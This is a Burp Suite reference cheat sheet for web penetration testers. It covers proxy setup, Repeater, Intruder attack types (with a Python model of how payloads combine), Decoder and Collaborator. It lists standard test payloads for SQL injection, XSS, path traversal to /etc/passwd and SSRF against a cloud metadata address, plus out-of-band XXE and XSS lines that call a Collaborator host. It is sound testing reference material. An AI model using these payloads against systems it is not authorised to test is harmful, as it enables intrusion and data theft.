Burp Suite Cheat Sheet

Setup & Proxy

Browser proxy:   127.0.0.1:8080
HTTPS:           Install Burp CA cert (http://burpsuite/cert)
Scope:           Target > Scope > Add target
Intercept:       Proxy > Intercept > On/Off

Keyboard Shortcuts

Shortcut        Action
Ctrl+R          Send to Repeater
Ctrl+I          Send to Intruder
Ctrl+S          Search
Ctrl+Z          Undo (in editors)
Ctrl+Space      Autocomplete
F12             Toggle intercept

Repeater

Used to manually replay and modify requests.

  1. Intercept a request → Ctrl+R (Send to Repeater)
  2. Modify request (headers, body, params)
  3. Click Send → inspect response
  4. Use < / > to compare request history

Tips:

  • Right-click → Change request method (GET ↔ POST)
  • Inspector panel shows parsed params
  • Follow redirects with the Follow redirect button

Intruder

Used for automated fuzzing and brute force.

Attack Types:
├── Sniper        — One payload set, one position at a time
├── Battering ram — One payload set, all positions simultaneously
├── Pitchfork     — Multiple sets, one per position (paired)
└── Cluster bomb  — Multiple sets, all combinations
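The four attack types differ only in how payload sets are combined across the marked positions, which also decides how many requests an attack generates (useful when budgeting against throttling). This is an added Python model of that combination logic, not Burp's own code; the `§` marker syntax matches Intruder, while the template and payload sets are constructed sample values.

```python
"""Model of how Burp Intruder's attack types combine payload positions
and payload sets. Added example, not Burp's own code."""
import itertools
import re

MARKER = "§"  # Intruder wraps each payload position in a pair of these

def parse_positions(template):
    """Split a template into literal chunks and the original value of
    each marked position, e.g. 'id=§1§&sort=§asc§'."""
    parts = re.split(rf"{MARKER}(.*?){MARKER}", template)
    # re.split with one capture group alternates literal, captured, literal, ...
    return parts[0::2], parts[1::2]

def render(chunks, values):
    """Reassemble the request with one value per position."""
    out = [chunks[0]]
    for value, chunk in zip(values, chunks[1:]):
        out.append(value)
        out.append(chunk)
    return "".join(out)

def intruder_requests(template, payload_sets, attack):
    """Yield every request the given attack type would send."""
    chunks, originals = parse_positions(template)
    n = len(originals)
    if attack == "sniper":
        # One set, one position at a time; other positions keep original value
        for i in range(n):
            for p in payload_sets[0]:
                values = list(originals)
                values[i] = p
                yield render(chunks, values)
    elif attack == "battering ram":
        # One set, the same payload placed in every position at once
        for p in payload_sets[0]:
            yield render(chunks, [p] * n)
    elif attack == "pitchfork":
        # One set per position, walked in parallel (stops at the shortest set)
        for values in zip(*payload_sets[:n]):
            yield render(chunks, list(values))
    elif attack == "cluster bomb":
        # One set per position, every combination (product of set sizes)
        for values in itertools.product(*payload_sets[:n]):
            yield render(chunks, list(values))
    else:
        raise ValueError(f"unknown attack type: {attack}")

# Constructed sample: a query string with two marked positions
TEMPLATE = "GET /items?id=§1§&sort=§asc§"
SET_A = ["1", "2"]
SET_B = ["asc", "desc", "name"]
```

With two positions, sniper sends len(SET_A) * 2 requests, battering ram len(SET_A), pitchfork min(len(SET_A), len(SET_B)) and cluster bomb len(SET_A) * len(SET_B).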

Payload Types:
├── Simple list  — Load wordlist file
├── Numbers      — Numeric range/step
├── Brute force  — Character set, min/max length
└── Runtime file — Load during attack

Rate limiting (Community Edition):

Project Options > Connections > Throttle: 100ms

Scanner (Pro only)

Right-click request → Scan
Active scan:   Sends attack payloads (intrusive)
Passive scan:  Analyzes traffic only (non-intrusive)

Dashboard > New Scan > Crawl and Audit

Decoder

Quickly encode/decode values:

URL encode:     %20, %2F, %3D
Base64:         dXNlcjpwYXNz
HTML entity:    &lt; &gt; &amp;
Hex:            41 42 43
Gzip:           compressed bytes

Common Test Payloads

SQL Injection:

'
''
`
')
"))
' OR '1'='1
' OR 1=1--
admin'--
1 UNION SELECT NULL--

XSS:

<script>alert(1)</script>
<img src=x onerror=alert(1)>
"><script>alert(1)</script>
javascript:alert(1)
<svg onload=alert(1)>

LFI:

../../../etc/passwd
....//....//etc/passwd
%2e%2e%2f%2e%2e%2fetc/passwd
/etc/passwd%00
php://filter/convert.base64-encode/resource=index.php

SSRF:

http://127.0.0.1/
http://169.254.169.254/latest/meta-data/
http://[::1]/
http://0.0.0.0:22/

Match & Replace Rules

Proxy > Options > Match and Replace
Useful rules:
- Remove X-Frame-Options header
- Change User-Agent to mobile
- Add custom auth header to all requests
- Replace "admin=false" with "admin=true"

Burp Collaborator

Used to detect out-of-band vulnerabilities (SSRF, blind XXE, blind XSS).

Burp > Burp Collaborator client > Copy to clipboard
Paste in payloads:
- Blind SSRF: http://[collaborator].burpcollaborator.net
- Blind XXE: <!ENTITY % file SYSTEM "http://[collaborator]/">
- Blind XSS: <script src="http://[collaborator]"></script>

Export Requests for Tools

# Right-click request > Copy to file → save as request.txt
# Use with sqlmap:
sqlmap -r request.txt

# Use with ffuf:
ffuf -request request.txt -request-proto http -w wordlist.txt